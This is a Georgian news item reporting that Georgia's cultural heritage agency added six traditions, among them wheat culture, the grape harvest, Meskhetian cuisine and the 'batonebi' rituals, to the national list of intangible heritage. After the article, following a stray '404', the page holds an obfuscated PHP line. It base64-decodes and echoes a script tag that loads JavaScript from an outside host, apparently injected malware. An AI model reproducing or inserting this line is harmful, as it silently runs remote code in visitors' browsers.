celsiusi
ავერსი შნაიდერი
ქართული ხორბლის კულტურა, რთველის ტრადიცია საქართველოში, მესხური სამზარეულო, მცხეთური ღვეზელის დამზადების ტრადიცია, ინფექციურ დაავადება ე.წ. „ბატონებთან“ დაკავშირებული რიტუალები და გელათის მეცნიერებათა აკადემიის ტრადიცია არამატერიალური კულტურული მემკვიდრეობის ობიექტების ნუსხაში შევიდა. ბრძანება ამის შესახებ საქართველოს კულტურული მემკვიდრეობის დაცვის ეროვნული სააგენტოს დირექტორმა გამოსცა.
ნიკოლოზ აზნაურაშვილის მიერ გამოცემულ დოკუმენტში ნათქვამია: „მიენიჭოს არამატერიალური კულტურული მემკვიდრეობის ძეგლის სტატუსი არამატერიალური კულტურული მემკვიდრეობის ობიექტებს: „ქართული ხორბლის კულტურა: ტრადიციები და რიტუალები“, „გელათის მეცნიერებათა აკადემიის ტრადიცია“, „რთვლის ტრადიცია საქართველოში“, „მცხეთური ღვეზელის დამზადების ტრადიცია და მისი კულტურული კონტექსტი“, „მესხური სამზარეულო – აპოხტის, წიბოსა და აპოხტის ხინკლის დამზადებისა და გამოყენების ტრადიცია“, „ინფექციურ დაავადება „ბატონებთან“ დაკავშირებული რიტუალური ქმედებები, სიმღერა და წეს-ჩვეულებები საქართველოში“.
ნიკოლოზ აზნაურაშვილის ბრძანება 9 იანვარს საკანონმდებლო მაცნეში გამოქვეყნდა და გამოქვეყნებისთანავე ამოქმედდა. 
404
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");